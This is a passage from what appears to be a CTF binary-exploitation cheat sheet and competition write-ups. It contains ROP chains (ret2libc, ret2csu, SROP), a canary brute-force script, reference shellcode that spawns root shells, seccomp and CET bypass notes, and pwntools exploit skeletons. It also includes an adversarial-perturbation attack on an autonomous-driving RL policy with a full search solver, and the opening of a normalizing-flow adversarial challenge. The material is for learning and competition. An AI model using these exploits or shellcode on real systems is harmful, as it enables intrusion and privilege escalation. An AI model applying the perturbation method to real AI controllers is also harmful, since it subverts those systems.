  • Overflow into metadata/object: corrupt size, next pointer, function pointer, vtable, length, or data pointer.
  • Aliased backing store: a high-level view (ArrayBuffer, slice, sprite, ledger view) still references native heap memory after resize/free.

Pwndbg commands:

1
2
3
4
5
6
7
heap
vis_heap_chunks
bins
tcachebins
fastbins
unsortedbin
arena

ASLR & Bypass Techniques

Method 1: Memory Leak

Despite ASLR, the relative offset between functions and data within the same module remains constant.

  1. Leak a known pointer (e.g., a function address in the GOT).
  2. Subtract its constant offset to find the base address.
  3. Calculate the addresses of all other gadgets/functions.

Method 2: Partial Overwrite (YOLO)

Memory is managed in pages (typically 0x1000 bytes). The lowest 12 bits of an address represent the page offset and are not randomized by ASLR.

  • Strategy: Overwrite only the least significant 1 or 2 bytes of the return address. This allows redirecting execution to a different instruction within the same page (or nearby) without knowing the randomized base. Overwriting 2 bytes usually requires a 1/16 brute-force of the 4th nibble.

Method 3: Fork Brute-force

In a fork()-based network server, child processes inherit the exact memory layout of the parent, including ASLR offsets and the canary.

  • Strategy: Brute-force the canary or return address byte-by-byte. If the child crashes, the parent simply forks a new one with the same values, allowing for infinite attempts.

Canary brute-force skeleton:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

canary = b"\x00"
for i in range(7):
for guess in range(256):
io = remote("host", 1337)
payload = b"A" * offset_to_canary + canary + bytes([guess])
io.send(payload)
out = io.recvall(timeout=0.2)
io.close()
if b"stack smashing detected" not in out and b"crash" not in out:
canary += bytes([guess])
break

Method 4: ret2libc

With NX enabled, call existing libc code instead of injecting code.

  1. Leak a libc pointer, e.g. puts(puts@GOT).
  2. Compute libc.address = leaked_puts - libc.sym["puts"].
  3. Call system("/bin/sh") or execve gadgets.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
elf = ELF("./chall")
libc = ELF("./libc.so.6")
rop = ROP(elf)

payload = flat(
b"A" * offset,
rop.find_gadget(["pop rdi", "ret"])[0],
elf.got["puts"],
elf.plt["puts"],
elf.sym["main"],
)

# receive leak, then second stage
libc.address = leak - libc.sym["puts"]
binsh = next(libc.search(b"/bin/sh\x00"))
payload = flat(
b"A" * offset,
ret, # optional stack alignment
pop_rdi,
binsh,
libc.sym["system"],
)

Method 5: ret2plt / ret2csu

  • ret2plt: call imported functions through PLT when the binary has useful PLT entries and controlled arguments.
  • ret2csu: use gadgets inside __libc_csu_init to populate RDI, RSI, RDX when simple pop rdi; ret / pop rsi; ret gadgets are missing.

Typical ret2csu idea:

1
2
gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
gadget 2: mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]

Set rbx = 0, rbp = 1, r12 = function_pointer_table, r13 = arg1, r14 = arg2, r15 = arg3.

Method 6: SROP

Sigreturn-oriented programming uses a fake rt_sigreturn frame to set all registers. Useful when gadgets are scarce but you can execute syscall with RAX = 15 (rt_sigreturn).

1
2
3
4
5
6
7
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret
payload = flat(b"A" * offset, pop_rax, 15, syscall_ret, bytes(frame))

Seccomp Notes

If shellcode or ROP mysteriously dies on execve, check seccomp filters.

1
2
seccomp-tools dump ./chall
strace ./chall

Common bypasses:

  • If execve is blocked but file syscalls are allowed: open/read/write or sendfile the flag.
  • If open is blocked but openat allowed: use openat(AT_FDCWD, "/flag", 0).
  • If only read, write, exit, sigreturn are allowed: consider SROP or staged ROP.

Shellcoding

Toolchain

1
2
3
4
5
6
7
8
# Compile shellcode (static, no libc)
gcc -nostdlib -static shellcode.s -o shellcode-elf

# Extract raw shellcode bytes
objcopy --dump-section .text=shellcode-raw shellcode-elf

# Compile with RWX .text (for SMC)
gcc -Wl,-N --static -nostdlib -o test test.s

Forbidden Bytes

Avoid bytes that terminate or split input strings:

Byte Name Trigger
0x00 null byte strcpy, printf (Terminator)
0x0a newline fgets, scanf (End of Input)
0x20 space scanf (Separator)

Null Byte Avoidance Techniques

Bad Good Reason
mov RAX, 0 xor EAX, EAX Avoids long null byte sequence
mov RAX, 5 xor EAX, EAX; mov AL, 5 Avoids 0x00 padding in 64-bit mov
mov RAX, 10 push 9; pop RAX; inc RAX Avoids 0x0a (newline)

Other size/filter tricks:

  • Use 32-bit register writes (eax, edi, esi) to avoid REX.W (0x48) and zero-extend into 64-bit registers.
  • Use push imm; pop reg for small constants.
  • Use cdq to zero/sign-fill RDX from EAX when EAX is positive.
  • Store strings on the stack in little-endian order.
  • XOR-encode constants to avoid bad bytes, then decode in-place.
  • If shellcode is called through a register, inspect live registers before execution; they may point to the shellcode mapping and save bytes with lea.

NOP Sled & Stack Shellcode

NOP sled (\x90) tolerates approximate jump targets. It is useful when stack addresses shift due to environment differences.

1
2
3
4
nop_sled = b"\x90" * 512
shellcode = asm(shellcraft.cat("/flag"))
payload = nop_sled + shellcode
payload = payload.ljust(offset, b"A") + p64(approx_stack_addr)

Avoid stack self-destruction: after ret, RSP points just above the return address. Shellcode using push may overwrite nearby bytes below RSP. Place shellcode sufficiently before/after the overwritten return path or use a large sled.

Staged Shellcode

When input length is too small, first-stage shellcode reads a larger second stage into RWX memory or stack, then jumps there.

1
2
3
4
5
6
7
; read(0, rsp, 0x400); jmp rsp
xor eax, eax
xor edi, edi
mov rsi, rsp
mov dx, 0x400
syscall
jmp rsp

Self-Modifying Code (SMC)

Runtime modification of the .text segment to bypass static filters. Requires the segment to be writable (-Wl,-N).

1
2
3
4
; Bypassing 'syscall' (0x0f05) filter
inc BYTE PTR [RIP+1]
.byte 0x0f
.byte 0x04 ; Runtime: 0x04 -> 0x05 (creating 0x0f05)

If the first page is made RX after input, place the patching code and patch targets on a later still-writable page, or use a first-stage jump over the protected region.

CET: SHSTK & IBT

Intel CET adds hardware CFI:

  • SHSTK (Shadow Stack): return addresses are mirrored on a protected shadow stack. ret compares the normal stack return address against the shadow one. A classic saved-RIP overwrite can crash even when canary is disabled.
  • IBT (Indirect Branch Tracking): indirect call/jmp targets must start with endbr64 (f3 0f 1e fa).
  • notrack prefix: notrack jmp rax can bypass IBT checks for that branch, so a corrupted function pointer/register may jump to shellcode or arbitrary code even when IBT is enabled.

When SHSTK blocks ROP, look for:

  • Non-return indirect branches: jmp rax, call rax, switch-table dispatch.
  • notrack jumps in compiler-generated switch code.
  • Writable function pointers, vtables, callback tables, jump-table indexes.
  • Logic bugs that reach win without hijacking ret.

Reference Shellcodes

x64 root shell (No REX.W/0x48)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Avoids \x48 (REX.W prefix)
.global _start
_start:
.intel_syntax noprefix

/* 0. Set UID to root (setuid(0)) */
xor edi, edi /* rdi = 0 (root UID) -> 31 ff */
push 105 /* syscall 105 (0x69) = setuid */
pop rax /* 6a 69 58 */
syscall

/* 1. Prepare null bytes and allocate stack space */
xor esi, esi
push rsi /* 8-byte null terminator */
push rsi /* space for /bin//sh */
push rsp
pop rdi /* push rsp (0x54) + pop rdi (0x5f) avoids mov rdi, rsp (0x48) */

/* 2. Construct /bin//sh on the stack (using 32-bit ops to avoid REX.W) */
/* 0x6e69622f = "nib/", 0x68732f2f = "hs//" (little-endian) */
mov dword ptr [rdi], 0x6e69622f
mov dword ptr [rdi+4], 0x68732f2f

/* 3. Set execve syscall number */
push 59
pop rax /* avoids mov rax, 59 */

/* 4. Clear edx (envp) and execute */
xor edx, edx
syscall

x64 execve("/bin/sh") (22-23 bytes)

1
2
3
4
5
6
7
8
9
10
11
12
13
; Standard 22-23 byte execve("/bin/sh")

; BITS 64

xor rsi, rsi ; Clear RSI (argv = NULL)
push rsi ; Push NULL terminator for string
mov rbx, 0x68732f2f6e69622f ; "/bin//sh" in little-endian
push rbx ; Push string to stack
push rsp ; Push address of string
pop rdi ; RDI = address of "/bin//sh" (filename)
mov al, 0x3b ; RAX = 59 (execve syscall number)
cdq ; RDX = 0 (envp = NULL) if RAX is positive
syscall ; Execute

x64 cat /flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
/* call open('rsp', 'O_RDONLY', 'rdx') */
push 2
pop rax
mov rdi, rsp
xor esi, esi /* O_RDONLY */
syscall
/* call sendfile(1, 'rax', 0, 0x7fffffff) */
mov r10d, 0x7fffffff
mov rsi, rax
push 40 /* 0x28 */
pop rax
push 1
pop rdi
cdq /* rdx=0 */
syscall

x64 cat /flag (No REX.W/0x48)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
.global _start
_start:
.intel_syntax noprefix

/* 1. OPEN: open("/flag", O_RDONLY) -> Syscall 2 */
xor esi, esi /* rsi = 0 (O_RDONLY) -> 31 f6 */
push rsi /* null terminator */
push rsp
pop rdi /* rdi points to stack top (avoids mov rdi, rsp) */

/* Construct "/flag" using 32-bit and 8-bit writes */
/* "/fla" = 0x616c662f */
mov dword ptr [rdi], 0x616c662f /* c7 07 2f 66 6c 61 */
/* "g" = 0x67 */
mov byte ptr [rdi+4], 0x67 /* c6 47 04 67 */

push 2
pop rax /* open syscall number */
syscall /* fd returned in rax */

/* 2. READ: read(fd, buffer, size) -> Syscall 0 */
xchg eax, edi /* rdi = fd, clears rax (0x97) */

push rsp
pop rsi /* rsi = rsp (buffer) */

mov dl, 100 /* rdx = 100 (size) using 8-bit register */
xor eax, eax /* read syscall number */
syscall

/* 3. WRITE: write(stdout, buffer, size) -> Syscall 1 */
xchg eax, edx /* rdx = bytes read (0x92) */

push 1
pop rdi /* rdi = 1 (stdout) */

push 1
pop rax /* write syscall number */
syscall

x64 cat /flag (No 'syscall' opcode)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
.section .shellcode,"awx"
.global _start
_start:
.intel_syntax noprefix
/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
/* call open('rsp', 'O_RDONLY', 'rdx') */
push 2
pop rax
mov rdi, rsp
xor esi, esi
inc byte ptr [rip + patch_target1 + 1]
patch_target1:
.byte 0x0f
.byte 0x04 /* Patched to 0x0f05 at runtime */
/* call sendfile(1, 'rax', 0, 0x7fffffff) */
mov r10d, 0x7fffffff
mov rsi, rax
push 40
pop rax
push 1
pop rdi
cdq
inc byte ptr [rip + patch_target2 + 1]
patch_target2:
.byte 0x0f
.byte 0x04

Common Terms

Term Description
ROP Return-Oriented Programming. Chaining "gadgets" ending in ret.
JOP/COP Jump/Call-Oriented Programming. Chains indirect jmp/call dispatch instead of ret.
ret2win Overwrite control flow to a hidden/success function in the binary.
ret2libc Redirecting execution to a libc function instead of shellcode.
ret2plt Calling a PLT stub in the binary, often to leak or invoke imported functions.
ret2csu Using __libc_csu_init gadgets to set up multi-register function calls.
SROP Sigreturn-Oriented Programming. Fake a signal frame to control registers.
PLT/GOT Procedure Linkage Table & Global Offset Table. Used for resolving external library function addresses.
OOB Out-of-bounds. Accessing memory outside the intended range of an array or buffer.
UAF Use-after-free. Reusing a pointer after its backing allocation has been freed.
SMC Self-modifying code. Code patches its own bytes at runtime.
CET Intel Control-flow Enforcement Technology: mainly SHSTK and IBT.
endbr64 Valid landing instruction required by IBT for indirect branch targets.

Exploit Skeletons

Local/Remote Toggle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./chall", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]

def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([elf.path] + argv, gdbscript="""
set disassembly-flavor intel
break *main
continue
""", *a, **kw)
if args.REMOTE:
return remote("host", 1337)
return process([elf.path] + argv, *a, **kw)

io = start(env={})

Run with:

1
2
3
python solve.py
python solve.py GDB
python solve.py REMOTE

Leak Parsing

1
2
3
4
5
io.recvuntil(b"leak: ")
leak = int(io.recvline().strip(), 16)

raw = io.recvn(6)
addr = u64(raw.ljust(8, b"\x00"))

Flat Payloads

1
2
3
4
5
6
7
8
payload = flat(
b"A" * offset,
canary,
b"B" * 8,
pop_rdi,
next(libc.search(b"/bin/sh\x00")),
libc.sym["system"],
)

Python: Integer to Byte Conversion

In Python, converting an integer (0-255) to a byte string requires careful handling of the bytes() constructor:

  • Incorrect: bytes(guess)
    • If guess = 5, this creates a null-filled byte string of length 5: b'\x00\x00\x00\x00\x00'.
  • Correct: bytes([guess])
    • Passing a list (iterable) treats the integer as the actual byte value.
    • If guess = 65, bytes([65]) results in b'A' (0x41).

movaps

movaps (Move Aligned Packed Single-Precision Floating-Point Values) 是 x86/x64 架构下的一条 SIMD(单指令多数据流)指令,主要用于高效的数据传输。

  • SIMD 向量化处理与高吞吐率: 现代 CPU 为了优化数据处理效率,会利用 XMM 寄存器执行向量化操作。movaps 能够单次吞吐 128 位(16 字节)的数据,极大地提升了内存带宽利用率。该指令被广泛应用于音视频编解码、图形渲染及密码学算法等密集型矩阵运算场景。
  • 内存对齐 (Memory Alignment) 与缓存行 (Cache Line) 机制: movaps 是一条强制要求内存对齐的指令,要求操作数的内存首地址必须是 16 的倍数(即 16 字节对齐)。现代 CPU 的 L1 数据缓存行通常为 64 字节。强制 16 字节对齐保证了这 16 字节的数据块绝对不会跨越两个不同的缓存行(Cache Line Boundary)。这使得 CPU 内部的内存控制器只需发起单次寻址操作即可完成数据读取,避免了跨缓存行读取带来的性能惩罚。

x64 ROP 链中的栈对齐

在 64 位 Linux PWN(漏洞利用)中,通过 ROP 链调用 system()printf() 等标准库函数时,常会遭遇程序崩溃。其根本原因在于破坏了系统调用约定的栈对齐规范。

  • System V AMD64 ABI 栈对齐规范: 在执行 call 指令跳转至目标函数前,rsp % 16 == 0call 会压入 8 字节返回地址,所以进入被调用函数第一条指令时通常是 rsp % 16 == 8。标准函数序言再执行 push rbp 后恢复到 rsp % 16 == 0
  • 触发 #GP 异常的根本原因: 当攻击者通过缓冲区溢出劫持控制流,并利用 ROP 链直接跳转至 system("/bin/sh") 时,往往忽略了对当前 rsp 状态的维护。如果此时 rsp 存在 8 字节的偏移错位,当执行到 Glibc 内部(如 do_systemvfprintf)时,由于这些高频函数在 -O3 优化级别下广泛使用 movaps 指令来操作局部变量,movaps 遇到未对齐的栈地址会直接触发硬件级别的 General Protection Fault (#GP 异常),最终由操作系统内核向进程发送 SIGSEGV 信号导致崩溃。
  • Exploit 解决方案:ret Gadget 栈平衡: 在 ROP 链中,在目标函数(如 system)的地址之前,预先插入一个极简的 ret Gadget(机器码 0xC3)。ret 指令的语义等价于 pop rip,它会将栈顶的 8 字节数据弹出。这 8 字节的指针位移恰好起到了栈指针补偿的作用,将错位的 rsp 重新调整至 16 字节对齐状态,从而规避 movaps 导致的硬件异常。

Quick fix:

1
2
ret = rop.find_gadget(["ret"])[0]
payload = flat(b"A" * offset, ret, pop_rdi, binsh, system)

32 位 (x86) 对齐

在 32 位漏洞利用中,因 movaps 导致的崩溃概率显著降低,其架构与编译层面的原因如下:

  • 调用约定 (Calling Convention) 的差异: 32 位环境(如 cdecl)主要依赖栈传参,每次 push 参数会导致栈指针 esp 发生 4 字节的位移。这种高频的 4 字节扰动使得 16 字节对齐极其难以在整个调用链中维持。
  • 编译器的指令选择策略: 鉴于 32 位下维护栈对齐的成本过高,编译器(尤其是旧版 GCC)通常会采取降级策略:默认生成容错率更高的 movups 指令(Move Unaligned,允许非对齐读取),或者直接放弃生成 SSE 向量化指令,转而使用标量指令来处理普通 C 代码。
  • 32 位的栈平滑方案: 如果在 32 位环境下确需解决 16 字节对齐导致的崩溃,不能像 64 位那样简单粗暴地填充一个 ret 指令。攻击者需要精确计算当前 esp 距离目标对齐状态的偏移量(4 的倍数),并寻找相应数量的 pop <reg>(例如 pop eax; ret)Gadget 来进行微调,直到满足 esp % 16 == 0 的条件。

roobet recently introduced their new game: rush hour. the objective of the game is to successfully bet on how many cars cross an arbitrary section of road in a given time. i have identified a highway exit on a california traffic cam that experts predict will have no traffic during this ctf. however, you somewhat unwisely bet that one car would take this exit. well, now's your chance. can you hack the autonomous car RL policy to drive to the target?

Challenge Overview

We are given a local challenge bundle containing a fixed reinforcement-learning driving policy and a remote service at rush-hour.challs.umdctf.io. The service accepts a small neural network that we control, which perturbs the observation vector seen by the fixed policy. The goal is to make the autonomous car drive into a hidden CTF target instead of the legitimate goal.

The twist: the local simulator uses a different physics timestep than the remote environment. An attack that works locally at one timestep may fail entirely at another.

Given Files

The challenge directory contains:

  • policy.py -- the fixed driving policy
  • attack.py -- the attacker network definition
  • game.py -- the environment/game loop
  • observations.py -- observation generation
  • physics.py -- car dynamics
  • weights.npz -- the fixed policy weights

We do not control the main driving policy. We only control a small attack network that adds a bounded perturbation to the policy's 8-dimensional observation.

Reverse Engineering

The Real Target

From game.py:

1
2
3
4
LEGIT_GOAL = (-20.0, -20.0)
CTF_GOAL = (18.5, -24.5)
CTF_RADIUS = 2.0
EPISODE_TIMEOUT = 60.0

The environment computes observations using LEGIT_GOAL, but the flag is awarded if the car reaches CTF_GOAL. The whole challenge is an adversarial-control problem: make the policy think it should do something slightly different at every timestep until it reaches the hidden target.

The Attacker Model

From attack.py, the network constraints are:

  • Input dimension: 8
  • Hidden dimension: 16
  • Output dimension: 8
  • Per-weight absolute value bound: 10.0
  • Output L2 norm bound after forward pass: 0.5

The submitted .npz must contain:

  • W0 shape (16, 8)
  • b0 shape (16,)
  • W1 shape (8, 16)
  • b1 shape (8,)

The forward pass is simple:

1
2
3
4
5
6
h = np.tanh(W0 @ obs + b0)
y = np.tanh(W1 @ h + b1)
norm = float(np.linalg.norm(y))
if norm > MAX_DELTA_L2:
y = y * (MAX_DELTA_L2 / norm)
return y

The perturbation is then added to the observation before the fixed policy runs.

Policy Inputs

From observations.py, the policy sees an 8-dimensional vector:

  • Normalized speed
  • Normalized steer angle
  • Heading cosine/sine
  • Goal-forward and goal-right coordinates in the car frame
  • Log-distance-to-goal
  • Constant bias term

This means the attack must be state-dependent -- a fixed offset would not work because the policy's inputs change as the car moves.

Initial Solve Strategy

The most direct approach: optimize the attack network weights directly against the provided simulator. This is the right starting point because:

  • The remote service accepts exactly this network format
  • The bundle includes the full local environment and fixed policy
  • The attack is small enough to search directly (280 parameters)
  • The simulator is deterministic (same seed = same result)

I built a local solver (solver.py) that:

  1. Simulates episodes from reset
  2. Evaluates attack candidates using the local environment
  3. Scores candidates by:
    • Huge reward for reaching the CTF goal
    • Otherwise minimizing distance to the CTF goal
  4. Uses an evolution-style search over attack weights

Solver Architecture

The solver uses a simple evolution strategy. The core idea: maintain a "center" set of weights in 280-dimensional space, sample random variations around it, run each variant through the simulator, pick the best ones, and move the center toward them.

See the Full Solver Code section below for the complete 205-line script.

Local Success

Running at the default dt=0.1, the search converged quickly:

1
SearchConfig(seed=7, iterations=600, population=96, dt=0.1)

The winning artifact looked great locally:

1
2
3
4
5
6
7
8
{
'goal_reached': True,
'timed_out': False,
'steps': 90,
'final_distance': 1.913,
'final_position': (17.04, -23.26),
'inside_goal_radius': True
}

At this point, it looked solved.

Why the First Solve Failed Remotely

Uploading the local-winning artifact to the remote service produced:

1
episode timed out

This was the key twist in the challenge. The remote behavior clearly diverged from local, even though both appeared to represent the same game.

Root Cause Investigation

Instead of guessing, I connected directly to the websocket endpoint used by the frontend:

1
wss://rush-hour.challs.umdctf.io/ws

The frontend JavaScript bundle showed that the page renders state messages including x, z, heading, speed, obs, obsDelta, goalReached, timedOut, and flag. This allowed me to stream live state from the remote server.

What the Remote Stream Showed

The remote server was sending state updates at a much finer time cadence:

1
2
3
{"t": 0.01986314600071637, ...}
{"t": 0.04219807200570358, ...}
{"t": 0.06386602800193941, ...}

So the remote simulator steps at approximately:

1
dt ~= 0.02

My original local solver was optimized at:

1
dt = 0.1

That difference turned out to be fatal.

Local Confirmation

I replayed the same "winning" artifact locally under multiple timesteps:

1
2
3
4
dt = 0.1          -> goal_reached = True
dt = 0.05 -> goal_reached = True
dt = 0.02 -> goal_reached = False, timed_out = True
dt = 0.019863146 -> goal_reached = False, timed_out = True

The artifact was not robust. It only won under a coarse fixed-step local simulation. The finer timestep changes the car's trajectory enough that the attack perturbations no longer steer toward the CTF goal.

This explained the remote timeout perfectly.

The Real Exploit

The real solve was:

  1. Use the provided local simulator to understand the control surface
  2. Discover that the remote environment runs at a different timestep (dt ~ 0.02)
  3. Retune the search against the remote-like cadence
  4. Submit the new artifact

I re-ran the search with the corrected timestep:

1
2
3
4
5
6
7
8
9
SearchConfig(
seed=99,
iterations=120,
population=48,
elite_count=8,
noise_scale=0.28,
dt=0.02,
max_time=60.0,
)

I tested several seeds and saved multiple candidates:

  • remote_seed1.npz
  • remote_seed7.npz
  • remote_seed42.npz
  • remote_seed99.npz

All of them transferred locally under the finer timestep.

Verification

I verified each candidate at both dt=0.02 and the exact remote cadence dt=0.019863146:

1
2
3
4
5
for seed in [1, 7, 42, 99]:
arrays = load_npz(f"artifacts/remote_seed{seed}.npz")
for dt in [0.02, 0.019863146]:
result = evaluate_attack(arrays, dt=dt)
print(f"seed={seed} dt={dt} -> goal={result['goal_reached']}")

All four seeds succeeded at both timesteps.

Final Remote Submission

Submitting remote_seed99.npz to the websocket and waiting for server-side state updates eventually produced:

1
2
3
4
5
{
"goalReached": true,
"timedOut": false,
"flag": "UMDCTF{********************************************************************}"
}

The relevant terminal output near the end:

1
2
3
state 400 {'t': 8.4639, 'x': 16.118, 'z': -25.057, 'goalReached': False, 'flag': None}
state 405 {'t': 8.5656, 'x': 16.681, 'z': -25.055, 'goalReached': True,
'flag': 'UMDCTF{********************************************************************}'}

Full Solver Code

The complete solver script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
from __future__ import annotations

import math
from argparse import ArgumentParser
from dataclasses import dataclass
from pathlib import Path
from typing import Any

import numpy as np

from attack import AttackModel
from game import CTF_GOAL, CTF_RADIUS, EPISODE_TIMEOUT, GameState
from policy import load_default_policy

MAX_WEIGHT = 10.0
PROJECT_DIR = Path(__file__).resolve().parent
ATTACK_SHAPES = {
"W0": (16, 8),
"b0": (16,),
"W1": (8, 16),
"b1": (8,),
}
ATTACK_PARAMETER_SIZE = 16 * 8 + 16 + 8 * 16 + 8


@dataclass(frozen=True)
class SearchConfig:
seed: int = 7
iterations: int = 600
population: int = 96
elite_count: int = 12
noise_scale: float = 0.28
dt: float = 0.02 # 远程环境步长 ~0.02;0.1 本地可过但远程 timeout
max_time: float = EPISODE_TIMEOUT


def default_attack_arrays() -> dict[str, np.ndarray]:
return {
"W0": np.zeros((16, 8), dtype=np.float32),
"b0": np.zeros((16,), dtype=np.float32),
"W1": np.zeros((8, 16), dtype=np.float32),
"b1": np.zeros((8,), dtype=np.float32),
}


def flatten_attack_arrays(arrays: dict[str, np.ndarray]) -> np.ndarray:
return np.concatenate(
[
arrays["W0"].astype(np.float32).ravel(),
arrays["b0"].astype(np.float32).ravel(),
arrays["W1"].astype(np.float32).ravel(),
arrays["b1"].astype(np.float32).ravel(),
]
)


def unflatten_attack_vector(vector: np.ndarray) -> dict[str, np.ndarray]:
x = np.asarray(vector, dtype=np.float32)
assert x.shape == (ATTACK_PARAMETER_SIZE,)
i = 0
w0 = x[i : i + 128].reshape(16, 8)
i += 128
b0 = x[i : i + 16]
i += 16
w1 = x[i : i + 128].reshape(8, 16)
i += 128
b1 = x[i : i + 8]
return {"W0": w0.copy(), "b0": b0.copy(), "W1": w1.copy(), "b1": b1.copy()}


def clamp_attack_arrays(arrays: dict[str, np.ndarray]) -> dict[str, np.ndarray]:
return {
key: np.clip(value, -MAX_WEIGHT, MAX_WEIGHT).astype(np.float32)
for key, value in arrays.items()
}


def save_attack_npz(path: str | Path, arrays: dict[str, np.ndarray]) -> None:
safe_arrays = clamp_attack_arrays(arrays)
target = Path(path)
target.parent.mkdir(parents=True, exist_ok=True)
np.savez(target, **safe_arrays)


def parse_args(argv: list[str] | None = None) -> tuple[SearchConfig, Path]:
parser = ArgumentParser(description="Search for a rush-hour attack candidate.")
parser.add_argument("--iterations", type=int, default=SearchConfig.iterations)
parser.add_argument("--dt", type=float, default=SearchConfig.dt,
help="Simulation timestep (default: %(default)s). "
"Remote env uses ~0.02; 0.1 passes locally but times out remotely.")
parser.add_argument(
"--output",
type=Path,
default=PROJECT_DIR / "artifacts" / "best_attack.npz",
)
args = parser.parse_args(argv)
return SearchConfig(
iterations=args.iterations,
dt=args.dt,
), args.output


def score_result(result: dict[str, Any]) -> float:
if result["goal_reached"]:
return 1_000_000.0 - float(result["steps"])
return -1000.0 * float(result["min_distance"]) - float(result["final_distance"])


def evaluate_attack(
arrays: dict[str, np.ndarray], dt: float = 0.02, max_time: float = EPISODE_TIMEOUT
) -> dict[str, Any]:
state = GameState(load_default_policy())
state.install_attack(AttackModel(arrays))

initial_dx = state.car.x - CTF_GOAL[0]
initial_dz = state.car.z - CTF_GOAL[1]
min_distance = math.hypot(initial_dx, initial_dz)
steps = 0
truncated = False
enforce_horizon = max_time < EPISODE_TIMEOUT
while (
not state.goal_reached
and not state.timed_out
and (not enforce_horizon or state.time + dt <= max_time)
):
state.step(dt)
dx = state.car.x - CTF_GOAL[0]
dz = state.car.z - CTF_GOAL[1]
min_distance = min(min_distance, math.hypot(dx, dz))
steps += 1

if (
enforce_horizon
and not state.goal_reached
and not state.timed_out
and state.time + dt > max_time
):
truncated = True

final_dx = state.car.x - CTF_GOAL[0]
final_dz = state.car.z - CTF_GOAL[1]
final_distance = math.hypot(final_dx, final_dz)

return {
"goal_reached": state.goal_reached,
"timed_out": state.timed_out,
"truncated": truncated,
"steps": steps,
"final_distance": final_distance,
"min_distance": min_distance,
"final_position": (state.car.x, state.car.z),
"inside_goal_radius": final_distance < CTF_RADIUS,
}


def run_search(config: SearchConfig) -> dict[str, Any]:
rng = np.random.default_rng(config.seed)
center = np.zeros(ATTACK_PARAMETER_SIZE, dtype=np.float32)
best_vector = center.copy()
best_result = evaluate_attack(
unflatten_attack_vector(best_vector), dt=config.dt, max_time=config.max_time
)
best_score = score_result(best_result)

for _ in range(config.iterations):
population: list[tuple[float, np.ndarray, dict[str, Any]]] = []
for _ in range(config.population):
candidate = center + rng.normal(0.0, config.noise_scale, size=center.shape).astype(
np.float32
)
arrays = clamp_attack_arrays(unflatten_attack_vector(candidate))
vector = flatten_attack_arrays(arrays)
result = evaluate_attack(arrays, dt=config.dt, max_time=config.max_time)
score = score_result(result)
population.append((score, vector, result))
if score > best_score:
best_score = score
best_vector = vector.copy()
best_result = result

population.sort(key=lambda item: item[0], reverse=True)
elite_vectors = [item[1] for item in population[: config.elite_count]]
center = np.mean(np.stack(elite_vectors, axis=0), axis=0).astype(np.float32)

best_arrays = clamp_attack_arrays(unflatten_attack_vector(best_vector))
return {
"best_score": float(best_score),
"best_vector": best_vector,
"best_arrays": best_arrays,
"best_result": best_result,
}


def main(argv: list[str] | None = None) -> int:
config, output_path = parse_args(argv)
result = run_search(config)
save_attack_npz(output_path, result["best_arrays"])
print(
{
"best_score": result["best_score"],
"goal_reached": result["best_result"]["goal_reached"],
"final_position": result["best_result"]["final_position"],
"output_path": str(output_path),
}
)
return 0


if __name__ == "__main__":
raise SystemExit(main())

Flag

UMDCTF{now_you_know_how_to_drive_an_autonomous_vehicle_now_go_win_on_roobet}

We trained two normalizing flow models on similar data distributions. Can you find an input that one model thinks is highly likely and the other thinks is not? Submit a perturbation around the reference window satisfying: L_inf <= 0.08, log q1(x) - log q0(x) >= 30, log q1(x) >= threshold, and log|det J_f1|(x) within a calibrated band.

Files provided: flow_0.pt, flow_1.pt, reference_window.npy, check_remote.py

Category: ML / Adversarial

前置知识

本题涉及归一化流(Normalizing Flows)对抗性攻击(Adversarial ML)的交叉领域。以下概念有助于理解:

概念 说明
归一化流 通过可逆双射将高斯分布变形为复杂分布,支持精确对数似然计算
RealNVP 仿射耦合层堆叠,雅可比行列式简化为缩放输出之和
变量变换公式 log q(x) = log π(f(x)) + log|det J_f|
对抗扰动 L∞ 约束限制每个像素最大变化量
梯度攻击(FGSM) 沿损失梯度符号方向一步扰动
线搜索 在梯度方向上尝试多个步长,选择最优值
Gram-Schmidt 正交化 将梯度方向正交化避免路径退化(flag 暗示)

参考:RealNVP 论文 arXiv:1605.08803,C&W 攻击 arXiv:1608.04644。

Initial Analysis

We are given two pretrained normalizing flow models (flow_0.pt and flow_1.pt) along with a reference input window (reference_window.npy). Normalizing flows are generative models that define a bijective mapping between a simple base distribution (usually a standard Gaussian) and a complex data distribution. They allow exact log-likelihood evaluation via the change-of-variables formula.

